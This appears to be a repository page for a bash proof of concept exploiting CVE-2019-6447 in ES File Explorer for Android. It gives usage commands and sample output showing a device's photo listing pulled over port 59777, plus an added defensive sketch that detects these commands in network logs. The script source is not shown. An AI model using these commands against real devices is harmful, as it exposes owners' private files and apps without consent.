Associated Vulnerability
Title: ES File Explorer File Manager application for Android access control error vulnerability (CVE-2019-6447)
Description: The ES File Explorer File Manager application through 4.1.9.7.4 for Android allows remote attackers to read arbitrary files or execute applications via TCP port 59777 requests on the local Wi-Fi network. This TCP port remains open after the ES application has been launched once, and responds to unauthenticated application/json data over HTTP.
Description
Very basic bash script to exploit the CVE-2019-6447.
Readme
# PoC ES File Explorer 4.1.9.7.4 (CVE-2019-6447)
<div align="center"><img height="150px" width="150px" src="https://img.icons8.com/ios/500/es-file-explorer.png"></img></div>
<p align="justify">This is a very simple bash implementation of the <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6447">CVE-2019-6447</a> PoC. It uses curl to send the requests with the right parameters. I built it because I was looking for a similar script during a CTF and couldn't find one. You can play around with the original script and customize it however you like.</p>
### Installation:
Simply clone the repository and use the .sh file.
```bash
git clone git@github.com:julio-cfa/POC-ES-File-Explorer-CVE-2019-6447.git
```
Or copy and paste the raw content to a file.
### Usage:
```text
kyoto :: ~ % ./ESExplorerExploit.sh -h
--- This is a very simple PoC of the ES File Explorer CVE-2019-6447 ---
You can try the following commands:
listFiles        List all files
listPics         List all pictures
listVideos       List all videos
listAudios       List all audios
listApps         List all applications installed
listAppsSystem   List system apps
listAppsPhone    List communication related applications
listAppsSdcard   List the apps installed on the sd card
listAppsAll      List all applications
getAppThumbnail  List icons for the specified application
appLaunch        Start the developed application
appPull          Download an application from your device
getDeviceInfo    Get system information
Usage example: ./ESExplorerExploit.sh 10.10.10.247 sdcard listFiles
```
### Example:
```text
kyoto :: ~ % ./ESExplorerExploit.sh 10.10.10.247 sdcard/DCIM listFiles
[
{"name":"example1.jpg", "time":"4/21/21 02:38:08 AM", "type":"file", "size":"135.33 KB (138,573 Bytes)", },
{"name":"example2.png", "time":"4/21/21 02:37:50 AM", "type":"file", "size":"6.24 KB (6,392 Bytes)", },
{"name":"example3.jpg", "time":"4/21/21 02:38:18 AM", "type":"file", "size":"1.14 MB (1,200,401 Bytes)", },
{"name":"example4.png", "time":"4/21/21 02:37:21 AM", "type":"file", "size":"124.88 KB (127,876 Bytes)", }
]
```
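For defenders, the traffic described above is easy to spot on a local network: any contact with TCP port 59777, and in particular JSON POSTs naming one of the commands from the help output. The following detection sketch is an added example, not part of the original repository; the JSON-lines log schema, the field names, the placeholder bodies and the sweep threshold are assumptions constructed for illustration.

```python
import json
from collections import defaultdict

ES_PORT = 59777  # TCP port named in the CVE-2019-6447 description
# Command names copied from the PoC's help output, longest first so that
# "listAppsSystem" is not reported as its prefix "listApps".
ES_COMMANDS = sorted(
    ["listFiles", "listPics", "listVideos", "listAudios", "listApps",
     "listAppsSystem", "listAppsPhone", "listAppsSdcard", "listAppsAll",
     "getAppThumbnail", "appLaunch", "appPull", "getDeviceInfo"],
    key=len, reverse=True)
SWEEP_THRESHOLD = 3  # assumed: distinct hosts contacted before a source counts as sweeping

# Constructed records in a hypothetical JSON-lines schema; bodies are placeholders.
SAMPLE_LOG = """\
{"src":"192.168.1.50","dst":"192.168.1.23","dport":59777,"method":"POST","ctype":"application/json","body":"<names getDeviceInfo>"}
{"src":"192.168.1.50","dst":"192.168.1.23","dport":59777,"method":"POST","ctype":"application/json","body":"<names listAppsSystem>"}
{"src":"192.168.1.77","dst":"192.168.1.10","dport":59777,"method":"GET","ctype":"","body":""}
{"src":"192.168.1.77","dst":"192.168.1.11","dport":59777,"method":"GET","ctype":"","body":""}
{"src":"192.168.1.77","dst":"192.168.1.12","dport":59777,"method":"GET","ctype":"","body":""}
{"src":"192.168.1.50","dst":"192.168.1.23","dport":443,"method":"POST","ctype":"application/json","body":"<names listFiles>"}
this line is not JSON and is skipped
"""

def analyse(log_text):
    """Return (hits, sweepers) for traffic aimed at the ES File Explorer port."""
    hits, targets = [], defaultdict(set)
    for line in log_text.splitlines():
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue
        if not isinstance(rec, dict) or rec.get("dport") != ES_PORT:
            continue
        src, dst = rec.get("src", "?"), rec.get("dst", "?")
        targets[src].add(dst)
        json_post = (rec.get("method") == "POST"
                     and "application/json" in rec.get("ctype", ""))
        cmd = next((c for c in ES_COMMANDS if c in rec.get("body", "")), None)
        # "command": the unauthenticated JSON-over-HTTP pattern; "probe": any other contact
        kind = "command" if json_post and cmd else "probe"
        hits.append((src, dst, kind, cmd))
    sweepers = sorted(s for s, d in targets.items() if len(d) >= SWEEP_THRESHOLD)
    return hits, sweepers

if __name__ == "__main__":
    found, sweeping = analyse(SAMPLE_LOG)
    for h in found:
        print(*h)
    print("sweeping sources:", sweeping)
```

A source listed under `sweepers` has touched the port on several devices, which fits scanning of the Wi-Fi segment rather than a single stray connection.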
### References:
If you're curious about how this exploit works behind the scenes, or if it fails and you have to build your own script, you can read the following links:
https://packetstormsecurity.com/files/163303/ES-File-Explorer-4.1.9.7.4-Arbitrary-File-Read.html \
https://github.com/fs0c131y/ESFileExplorerOpenPortVuln \
https://www.safe.security/assets/img/research-paper/pdf/es-file-explorer-vulnerability.pdf \
https://medium.com/@knownsec404team/analysis-of-es-file-explorer-security-vulnerability-cve-2019-6447-7f34407ed566
File Snapshot
[4.0K] /data/pocs/42b431abd393a7a5da5bfc3e791bf68c79f5934e
├── [1.3K] ESExplorerExploit.sh
└── [2.7K] README.md
0 directories, 2 files